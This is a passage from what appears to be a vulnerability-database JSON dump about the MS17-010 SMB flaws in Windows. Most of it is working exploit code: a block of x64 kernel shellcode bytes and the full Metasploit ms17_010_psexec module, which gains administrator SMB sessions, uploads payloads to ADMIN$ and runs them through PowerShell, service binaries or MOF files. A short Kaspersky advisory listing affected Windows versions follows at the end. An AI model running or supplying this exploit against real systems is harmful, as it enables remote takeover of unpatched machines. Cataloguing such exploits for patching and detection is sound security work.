offset \n# teb_acp = TEB.ActivationContextPointer offset \n# et_tle = ETHREAD.ThreadListEntry offset \ndef make_kernel_user_payload(ring3, proc_name, ep_thl_b, et_alertable, teb_acp, et_tle) \nsc = make_kernel_shellcode \nsc << [ring3.length].pack(\"S<\") \nsc << ring3 \nsc \nend \n \ndef make_kernel_shellcode \n# https://github.com/RiskSense-Ops/MS17-010/blob/master/payloads/x64/src/exploit/kernel.asm \n# Name: kernel \n# Length: 1019 bytes \n \n#\"\\xcc\"+ \n\"\\xB9\\x82\\x00\\x00\\xC0\\x0F\\x32\\x48\\xBB\\xF8\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\" + \n\"\\xFF\\x89\\x53\\x04\\x89\\x03\\x48\\x8D\\x05\\x0A\\x00\\x00\\x00\\x48\\x89\\xC2\" + \n\"\\x48\\xC1\\xEA\\x20\\x0F\\x30\\xC3\\x0F\\x01\\xF8\\x65\\x48\\x89\\x24\\x25\\x10\" + \n\"\\x00\\x00\\x00\\x65\\x48\\x8B\\x24\\x25\\xA8\\x01\\x00\\x00\\x50\\x53\\x51\\x52\" + \n\"\\x56\\x57\\x55\\x41\\x50\\x41\\x51\\x41\\x52\\x41\\x53\\x41\\x54\\x41\\x55\\x41\" + \n\"\\x56\\x41\\x57\\x6A\\x2B\\x65\\xFF\\x34\\x25\\x10\\x00\\x00\\x00\\x41\\x53\\x6A\" + \n\"\\x33\\x51\\x4C\\x89\\xD1\\x48\\x83\\xEC\\x08\\x55\\x48\\x81\\xEC\\x58\\x01\\x00\" + \n\"\\x00\\x48\\x8D\\xAC\\x24\\x80\\x00\\x00\\x00\\x48\\x89\\x9D\\xC0\\x00\\x00\\x00\" + \n\"\\x48\\x89\\xBD\\xC8\\x00\\x00\\x00\\x48\\x89\\xB5\\xD0\\x00\\x00\\x00\\x48\\xA1\" + \n\"\\xF8\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\\xFF\\x48\\x89\\xC2\\x48\\xC1\\xEA\\x20\\x48\" + \n\"\\x31\\xDB\\xFF\\xCB\\x48\\x21\\xD8\\xB9\\x82\\x00\\x00\\xC0\\x0F\\x30\\xFB\\xE8\" + \n\"\\x38\\x00\\x00\\x00\\xFA\\x65\\x48\\x8B\\x24\\x25\\xA8\\x01\\x00\\x00\\x48\\x83\" + \n\"\\xEC\\x78\\x41\\x5F\\x41\\x5E\\x41\\x5D\\x41\\x5C\\x41\\x5B\\x41\\x5A\\x41\\x59\" + \n\"\\x41\\x58\\x5D\\x5F\\x5E\\x5A\\x59\\x5B\\x58\\x65\\x48\\x8B\\x24\\x25\\x10\\x00\" + \n\"\\x00\\x00\\x0F\\x01\\xF8\\xFF\\x24\\x25\\xF8\\x0F\\xD0\\xFF\\x56\\x41\\x57\\x41\" + \n\"\\x56\\x41\\x55\\x41\\x54\\x53\\x55\\x48\\x89\\xE5\\x66\\x83\\xE4\\xF0\\x48\\x83\" + \n\"\\xEC\\x20\\x4C\\x8D\\x35\\xE3\\xFF\\xFF\\xFF\\x65\\x4C\\x8B\\x3C\\x25\\x38\\x00\" + \n\"\\x00\\x00\\x4D\\x8B\\x7F\\x04\\x49\\xC1\\xEF\\x0C\\x49\\xC1\\xE7\\x0C\\x49\\x81\" + \n\"\\xEF\\x00\\x10\\x00\\x00\\x49\\x8B\\x37\\x66\\x81\\xFE\\x4D\\x5A\\x75\\xEF\\x41\" + \n\"\\xBB\\x5C\\x72\\x11\\x62\\xE8\\x18\\x02\\x00\\x00\\x48\\x89\\xC6\\x48\\x81\\xC6\" + \n\"\\x08\\x03\\x00\\x00\\x41\\xBB\\x7A\\xBA\\xA3\\x30\\xE8\\x03\\x02\\x00\\x00\\x48\" + \n\"\\x89\\xF1\\x48\\x39\\xF0\\x77\\x11\\x48\\x8D\\x90\\x00\\x05\\x00\\x00\\x48\\x39\" + \n\"\\xF2\\x72\\x05\\x48\\x29\\xC6\\xEB\\x08\\x48\\x8B\\x36\\x48\\x39\\xCE\\x75\\xE2\" + \n\"\\x49\\x89\\xF4\\x31\\xDB\\x89\\xD9\\x83\\xC1\\x04\\x81\\xF9\\x00\\x00\\x01\\x00\" + \n\"\\x0F\\x8D\\x66\\x01\\x00\\x00\\x4C\\x89\\xF2\\x89\\xCB\\x41\\xBB\\x66\\x55\\xA2\" + \n\"\\x4B\\xE8\\xBC\\x01\\x00\\x00\\x85\\xC0\\x75\\xDB\\x49\\x8B\\x0E\\x41\\xBB\\xA3\" + \n\"\\x6F\\x72\\x2D\\xE8\\xAA\\x01\\x00\\x00\\x48\\x89\\xC6\\xE8\\x50\\x01\\x00\\x00\" + \n\"\\x41\\x81\\xF9\\xBF\\x77\\x1F\\xDD\\x75\\xBC\\x49\\x8B\\x1E\\x4D\\x8D\\x6E\\x10\" + \n\"\\x4C\\x89\\xEA\\x48\\x89\\xD9\\x41\\xBB\\xE5\\x24\\x11\\xDC\\xE8\\x81\\x01\\x00\" + \n\"\\x00\\x6A\\x40\\x68\\x00\\x10\\x00\\x00\\x4D\\x8D\\x4E\\x08\\x49\\xC7\\x01\\x00\" + \n\"\\x10\\x00\\x00\\x4D\\x31\\xC0\\x4C\\x89\\xF2\\x31\\xC9\\x48\\x89\\x0A\\x48\\xF7\" + \n\"\\xD1\\x41\\xBB\\x4B\\xCA\\x0A\\xEE\\x48\\x83\\xEC\\x20\\xE8\\x52\\x01\\x00\\x00\" + \n\"\\x85\\xC0\\x0F\\x85\\xC8\\x00\\x00\\x00\\x49\\x8B\\x3E\\x48\\x8D\\x35\\xE9\\x00\" + \n\"\\x00\\x00\\x31\\xC9\\x66\\x03\\x0D\\xD7\\x01\\x00\\x00\\x66\\x81\\xC1\\xF9\\x00\" + \n\"\\xF3\\xA4\\x48\\x89\\xDE\\x48\\x81\\xC6\\x08\\x03\\x00\\x00\\x48\\x89\\xF1\\x48\" + \n\"\\x8B\\x11\\x4C\\x29\\xE2\\x51\\x52\\x48\\x89\\xD1\\x48\\x83\\xEC\\x20\\x41\\xBB\" + \n\"\\x26\\x40\\x36\\x9D\\xE8\\x09\\x01\\x00\\x00\\x48\\x83\\xC4\\x20\\x5A\\x59\\x48\" + \n\"\\x85\\xC0\\x74\\x18\\x48\\x8B\\x80\\xC8\\x02\\x00\\x00\\x48\\x85\\xC0\\x74\\x0C\" + \n\"\\x48\\x83\\xC2\\x4C\\x8B\\x02\\x0F\\xBA\\xE0\\x05\\x72\\x05\\x48\\x8B\\x09\\xEB\" + \n\"\\xBE\\x48\\x83\\xEA\\x4C\\x49\\x89\\xD4\\x31\\xD2\\x80\\xC2\\x90\\x31\\xC9\\x41\" + \n\"\\xBB\\x26\\xAC\\x50\\x91\\xE8\\xC8\\x00\\x00\\x00\\x48\\x89\\xC1\\x4C\\x8D\\x89\" + \n\"\\x80\\x00\\x00\\x00\\x41\\xC6\\x01\\xC3\\x4C\\x89\\xE2\\x49\\x89\\xC4\\x4D\\x31\" + \n\"\\xC0\\x41\\x50\\x6A\\x01\\x49\\x8B\\x06\\x50\\x41\\x50\\x48\\x83\\xEC\\x20\\x41\" + \n\"\\xBB\\xAC\\xCE\\x55\\x4B\\xE8\\x98\\x00\\x00\\x00\\x31\\xD2\\x52\\x52\\x41\\x58\" + \n\"\\x41\\x59\\x4C\\x89\\xE1\\x41\\xBB\\x18\\x38\\x09\\x9E\\xE8\\x82\\x00\\x00\\x00\" + \n\"\\x4C\\x89\\xE9\\x41\\xBB\\x22\\xB7\\xB3\\x7D\\xE8\\x74\\x00\\x00\\x00\\x48\\x89\" + \n\"\\xD9\\x41\\xBB\\x0D\\xE2\\x4D\\x85\\xE8\\x66\\x00\\x00\\x00\\x48\\x89\\xEC\\x5D\" + \n\"\\x5B\\x41\\x5C\\x41\\x5D\\x41\\x5E\\x41\\x5F\\x5E\\xC3\\xE9\\xB5\\x00\\x00\\x00\" + \n\"\\x4D\\x31\\xC9\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\\x3C\\x61\\x7C\\x02\\x2C\\x20\" + \n\"\\x41\\x01\\xC1\\x38\\xE0\\x75\\xEC\\xC3\\x31\\xD2\\x65\\x48\\x8B\\x52\\x60\\x48\" + \n\"\\x8B\\x52\\x18\\x48\\x8B\\x52\\x20\\x48\\x8B\\x12\\x48\\x8B\\x72\\x50\\x48\\x0F\" + \n\"\\xB7\\x4A\\x4A\\x45\\x31\\xC9\\x31\\xC0\\xAC\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\" + \n\"\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xEE\\x45\\x39\\xD9\\x75\\xDA\\x4C\\x8B\\x7A\" + \n\"\\x20\\xC3\\x4C\\x89\\xF8\\x41\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xC2\\x8B\" + \n\"\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xD0\\x50\\x8B\" + \n\"\\x48\\x18\\x44\\x8B\\x40\\x20\\x49\\x01\\xD0\\x48\\xFF\\xC9\\x41\\x8B\\x34\\x88\" + \n\"\\x48\\x01\\xD6\\xE8\\x78\\xFF\\xFF\\xFF\\x45\\x39\\xD9\\x75\\xEC\\x58\\x44\\x8B\" + \n\"\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\\x44\\x8B\\x40\\x1C\\x49\\x01\" + \n\"\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x5E\\x59\\x5A\\x41\\x58\\x41\\x59\\x41\" + \n\"\\x5B\\x41\\x53\\xFF\\xE0\\x56\\x41\\x57\\x55\\x48\\x89\\xE5\\x48\\x83\\xEC\\x20\" + \n\"\\x41\\xBB\\xDA\\x16\\xAF\\x92\\xE8\\x4D\\xFF\\xFF\\xFF\\x31\\xC9\\x51\\x51\\x51\" + \n\"\\x51\\x41\\x59\\x4C\\x8D\\x05\\x1A\\x00\\x00\\x00\\x5A\\x48\\x83\\xEC\\x20\\x41\" + \n\"\\xBB\\x46\\x45\\x1B\\x22\\xE8\\x68\\xFF\\xFF\\xFF\\x48\\x89\\xEC\\x5D\\x41\\x5F\" + \n\"\\x5E\\xC3\" \nend \n \nend \n`\n", "_object_type": "robots.models.packetstorm.PacketstormBulletin", "_object_types": ["robots.models.packetstorm.PacketstormBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "PACKETSTORM:146236", "hash": "bd02644e28f045b0087dc78310444a2d", "type": "packetstorm", "bulletinFamily": "exploit", "title": "MS17-010 EternalRomance / EternalSynergy / EternalChampion SMB Remote Windows Code Execution", "description": "", "published": "2018-02-03T00:00:00", "modified": "2018-02-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/146236/MS17-010-EternalRomance-EternalSynergy-EternalChampion-SMB-Remote-Windows-Code-Execution.html", "reporter": "Shadow Brokers", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "lastseen": "2018-02-03T08:25:18", "history": [], "viewCount": 45, "enchantments": {"score": {"value": 8.9, "vector": "NONE", "modified": "2018-02-03T08:25:18", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-33895"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96709", "SMNTC-96707"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0146", "MS:CVE-2017-0147"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "saint", "idList": ["SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "securelist", "idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}], "modified": "2018-02-03T08:25:18", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://packetstormsecurity.com/files/download/146236/ms17_010_psexec.rb.txt", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \n# Windows XP systems that are not part of a domain default to treating all \n# network logons as if they were Guest. This prevents SMB relay attacks from \n# gaining administrative access to these systems. This setting can be found \n# under: \n# \n# Local Security Settings > \n# Local Policies > \n# Security Options > \n# Network Access: Sharing and security model for local accounts \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010 \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::WbemExec \ninclude Msf::Auxiliary::Report \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution', \n'Description' => %q{ \nThis module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where \nprimitive. This will then be used to overwrite the connection session information with as an \nAdministrator session. From there, the normal psexec payload code execution is done. \n \nExploits a type confusion between Transaction and WriteAndX requests and a race condition in \nTransaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy \nexploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a \nnamed pipe. \n}, \n'Author' => \n[ \n'sleepya', # zzz_exploit idea and offsets \n'zerosum0x0', \n'Shadow Brokers', \n'Equation Group' \n], \n'License' => MSF_LICENSE, \n'DefaultOptions' => \n{ \n'WfsDelay' => 10, \n'EXITFUNC' => 'thread' \n}, \n'References' => \n[ \n[ 'AKA', 'ETERNALSYNERGY' ], \n[ 'AKA', 'ETERNALROMANCE' ], \n[ 'AKA', 'ETERNALCHAMPION' ], \n[ 'AKA', 'ETERNALBLUE'], # does not use any CVE from Blue, but Search should show this, it is preferred \n[ 'MSB', 'MS17-010' ], \n[ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests \n[ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests \n[ 'CVE', '2017-0147'], # for EternalRomance reference \n[ 'URL', 'https://github.com/worawit/MS17-010' ], \n[ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ], \n[ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ], \n], \n'Payload' => \n{ \n'Space' => 3072, \n'DisableNops' => true \n}, \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Targets' => \n[ \n[ 'Automatic', { } ], \n[ 'PowerShell', { } ], \n[ 'Native upload', { } ], \n[ 'MOF upload', { } ] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Mar 14 2017' \n)) \n \nregister_options( \n[ \nOptString.new('SHARE', [ true, \"The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share\", 'ADMIN$' ]) \n]) \n \nregister_advanced_options( \n[ \nOptBool.new('ALLOW_GUEST', [true, \"Keep trying if only given guest access\", false]), \nOptString.new('SERVICE_FILENAME', [false, \"Filename to to be used on target for the service binary\",nil]), \nOptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe']), \nOptString.new('SERVICE_STUB_ENCODER', [false, \"Encoder to use around the service registering stub\",nil]) \n]) \nend \n \ndef exploit \nbegin \neternal_pwn(datastore['RHOST']) \nsmb_pwn() \n \nrescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e \nprint_error(\"#{e.message}\") \nrescue ::Errno::ECONNRESET, \n::Rex::Proto::SMB::Exceptions::LoginError, \n::Rex::HostUnreachable, \n::Rex::ConnectionTimeout, \n::Rex::ConnectionRefused => e \nprint_error(\"#{e.class}: #{e.message}\") \nrescue => error \nprint_error(error.class.to_s) \nprint_error(error.message) \nprint_error(error.backtrace.join(\"\\n\")) \nensure \neternal_cleanup() # restore session \nend \nend \n \ndef smb_pwn() \ncase target.name \nwhen 'Automatic' \nif powershell_installed? \nprint_status('Selecting PowerShell target') \npowershell \nelse \nprint_status('Selecting native target') \nnative_upload \nend \nwhen 'PowerShell' \npowershell \nwhen 'Native upload' \nnative_upload \nwhen 'MOF upload' \nmof_upload \nend \n \nhandler \nend \n \n \n# TODO: Again, shamelessly copypasta from the psexec exploit module. Needs to \n# be moved into a mixin \n \ndef powershell_installed? \nshare = \"\\\\\\\\#{datastore['RHOST']}\\\\#{datastore['SHARE']}\" \n \ncase datastore['SHARE'].upcase \nwhen 'ADMIN$' \npath = 'System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' \nwhen 'C$' \npath = 'Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' \nelse \npath = datastore['PSH_PATH'] \nend \n \nsimple.connect(share) \n \nvprint_status(\"Checking for #{path}\") \n \nif smb_file_exist?(path) \nvprint_status('PowerShell found') \npsh = true \nelse \nvprint_status('PowerShell not found') \npsh = false \nend \n \nsimple.disconnect(share) \n \npsh \nend \n \ndef powershell \nENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME'] \ncommand = cmd_psh_payload(payload.encoded, payload_instance.arch.first) \n \nif datastore['PSH::persist'] and not datastore['DisablePayloadHandler'] \nprint_warning(\"You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option\") \nend \n \n# Execute the powershell command \nprint_status(\"Executing the payload...\") \nbegin \npsexec(command) \nrescue StandardError => exec_command_error \nfail_with(Failure::Unknown, \"#{peer} - Unable to execute specified command: #{exec_command_error}\") \nend \nend \n \ndef native_upload \nfilename = datastore['SERVICE_FILENAME'] || \"#{rand_text_alpha(8)}.exe\" \nservicename = datastore['SERVICE_NAME'] || rand_text_alpha(8) \nserviceencoder = datastore['SERVICE_STUB_ENCODER'] || '' \n \n# Upload the shellcode to a file \nprint_status(\"Uploading payload...\") \nsmbshare = datastore['SHARE'] \nfileprefix = \"\" \n# if SHARE = Users/sasha/ or something like this \nif smbshare =~ /.[\\\\\\/]/ \nsubfolder = true \nsmbshare = datastore['SHARE'].dup \nsmbshare = smbshare.gsub(/^[\\\\\\/]/,\"\") \nfolder_list = smbshare.split(/[\\\\\\/]/) \nsmbshare = folder_list[0] \nfileprefix = folder_list[1..-1].map {|a| a + \"\\\\\"}.join.gsub(/\\\\$/,\"\") if folder_list.length > 1 \nsimple.connect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\") \nfd = smb_open(\"\\\\#{fileprefix}\\\\#{filename}\", 'rwct') \nelse \nsubfolder = false \nsimple.connect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\") \nfd = smb_open(\"\\\\#{filename}\", 'rwct') \nend \nexe = '' \nopts = { :servicename => servicename, :serviceencoder => serviceencoder} \nbegin \nexe = generate_payload_exe_service(opts) \n \nfd << exe \nensure \nfd.close \nend \n \nif subfolder \nprint_status(\"Created \\\\#{fileprefix}\\\\#{filename}...\") \nelse \nprint_status(\"Created \\\\#{filename}...\") \nend \n \n# Disconnect from the share \nsimple.disconnect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\") \n \n# define the file location \nif datastore['SHARE'] == 'ADMIN$' \nfile_location = \"%SYSTEMROOT%\\\\#{filename}\" \nelsif datastore['SHARE'] =~ /^[a-zA-Z]\\$$/ \nfile_location = datastore['SHARE'].slice(0,1) + \":\\\\#{filename}\" \nelse \nfile_location = \"\\\\\\\\127.0.0.1\\\\#{smbshare}\\\\#{fileprefix}\\\\#{filename}\" \nend \n \npsexec(file_location, false) \n \nunless datastore['SERVICE_PERSIST'] \nprint_status(\"Deleting \\\\#{filename}...\") \n#This is not really useful but will prevent double \\\\ on the wire :) \nif datastore['SHARE'] =~ /.[\\\\\\/]/ \nsimple.connect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\") \nbegin \nsimple.delete(\"\\\\#{fileprefix}\\\\#{filename}\") \nrescue XCEPT::ErrorCode => e \nprint_error(\"Delete of \\\\#{fileprefix}\\\\#{filename} failed: #{e.message}\") \nend \nelse \nsimple.connect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\") \nbegin \nsimple.delete(\"\\\\#{filename}\") \nrescue XCEPT::ErrorCode => e \nprint_error(\"Delete of \\\\#{filename} failed: #{e.message}\") \nend \nend \nend \nend \n \ndef mof_upload \nshare = \"\\\\\\\\#{datastore['RHOST']}\\\\ADMIN$\" \nfilename = datastore['SERVICE_FILENAME'] || \"#{rand_text_alpha(8)}.exe\" \n \n# payload as exe \nprint_status(\"Trying wbemexec...\") \nprint_status(\"Uploading Payload...\") \nif datastore['SHARE'] != 'ADMIN$' \nprint_error('Wbem will only work with ADMIN$ share') \nreturn \nend \nsimple.connect(share) \nexe = generate_payload_exe \nfd = smb_open(\"\\\\system32\\\\#{filename}\", 'rwct') \nfd << exe \nfd.close \nprint_status(\"Created %SystemRoot%\\\\system32\\\\#{filename}\") \n \n# mof to cause execution of above \nmofname = rand_text_alphanumeric(14) + \".MOF\" \nmof = generate_mof(mofname, filename) \nprint_status(\"Uploading MOF...\") \nfd = smb_open(\"\\\\system32\\\\wbem\\\\mof\\\\#{mofname}\", 'rwct') \nfd << mof \nfd.close \nprint_status(\"Created %SystemRoot%\\\\system32\\\\wbem\\\\mof\\\\#{mofname}\") \n \n# Disconnect from the ADMIN$ \nsimple.disconnect(share) \nend \n \ndef report_auth \nservice_data = { \naddress: ::Rex::Socket.getaddress(datastore['RHOST'],true), \nport: datastore['RPORT'], \nservice_name: 'smb', \nprotocol: 'tcp', \nworkspace_id: myworkspace_id \n} \n \ncredential_data = { \norigin_type: :service, \nmodule_fullname: self.fullname, \nprivate_data: datastore['SMBPass'], \nusername: datastore['SMBUser'].downcase \n} \n \nif datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP' \ncredential_data.merge!({ \nrealm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN, \nrealm_value: datastore['SMBDomain'] \n}) \nend \n \nif datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/ \ncredential_data.merge!({:private_type => :ntlm_hash}) \nelse \ncredential_data.merge!({:private_type => :password}) \nend \n \ncredential_data.merge!(service_data) \n \ncredential_core = create_credential(credential_data) \n \nlogin_data = { \naccess_level: 'Admin', \ncore: credential_core, \nlast_attempted_at: DateTime.now, \nstatus: Metasploit::Model::Login::Status::SUCCESSFUL \n} \n \nlogin_data.merge!(service_data) \ncreate_credential_login(login_data) \nend \nend \n`\n", "_object_type": "robots.models.packetstorm.PacketstormBulletin", "_object_types": ["robots.models.packetstorm.PacketstormBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}], "kaspersky": [{"id": "KLA10977", "hash": "3fbc1ad46e9debcf4080eda775c63524", "type": "kaspersky", "bulletinFamily": "info", "title": "KLA10977 Multiple vulnerabilities in Microsoft Server Message Block (SMB)", "description": "### *Detect date*:\n03/14/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Server Message Block 1.0(SMBv1). Malicious users can exploit these vulnerabilities to execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Windows XP Service Pack 2 \nMicrosoft Windows XP Service Pack 3 \nMicrosoft Windows XP Embedded Service Pack 3 \nMicrosoft Windows Vista Service Pack 2 \nMicrosoft Windows 7 Service Pack 1 \nMicrosoft Windows 8 \nMicrosoft Windows 8.1 \nMicrosoft Windows RT 8.1 \nMicrosoft Windows 10 \nMicrosoft Windows Server 2003 Service Pack 2 \nMicrosoft Windows Server 2008 Service Pack 2 \nMicrosoft Windows Server 2008 R2 Service Pack 1 \nMicrosoft Windows Server 2012 \nMicrosoft Windows Server 2012 R2 \nMicrosoft Windows Server 2016\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[Customer Guidance for WannaCrypt attacks](<https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>) \n[Securelist](<https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/>) \n[MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) \n[CVE-2017-0143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143>) \n[CVE-2017-0144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144>) \n[CVE-2017-0145](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145>) \n[CVE-2017-0146](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146>) \n[CVE-2017-0147](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147>) \n[CVE-2017-0148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows Vista](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Vista-4/>)\n\n### *CVE-IDS*:\n[CVE-2017-0143](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>)9.3Critical \n[CVE-2017-0144](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>)9.3Critical \n[CVE-2017-0145](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>)9.3Critical 